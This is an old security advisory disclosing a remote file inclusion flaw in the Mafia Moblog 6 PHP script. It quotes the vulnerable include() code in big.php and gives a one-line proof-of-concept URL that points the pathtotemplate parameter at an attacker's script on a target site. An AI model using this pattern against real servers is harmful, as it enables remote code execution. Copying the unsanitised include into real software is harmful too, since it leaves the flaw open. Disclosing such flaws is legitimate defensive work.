------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir ------------------------------------------------------------------------ ------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Mafia Moblog version : 6 Venedor : http://mafia.pearlabs.org Class : Remote File Inclusion Risk : High Summary : A Free, Fully Customizeable, Open-Source MoBlog script that will run on any platform that is PHP and MySQL compatible. ------------------------------------------------------------------------ ------------------- Vulnerability: ~~~~~~~~~~~~~ The problem exists is in the big.php when used the variable $pathtotemplate in a include() function without being Declared. ----------------------------------------big.php------------------------- ------------------- ... <?php include("info.php"); include("template.php"); if (file_exists("$pathtotemplate/includes.php")) {include("$pathtotemplate/includes.php");} include("$pathtotemplate/big.php"); ?> ... ------------------------------------------------------------------------ ------------------- PoC: ~~~ http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $pathtotemplate in big.php ------------------------------------------------------------------------ ------------------- Note: ~~~~ venedor contacted, but no response. so do a dirty patch. ------------------------------------------------------------------------ ------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams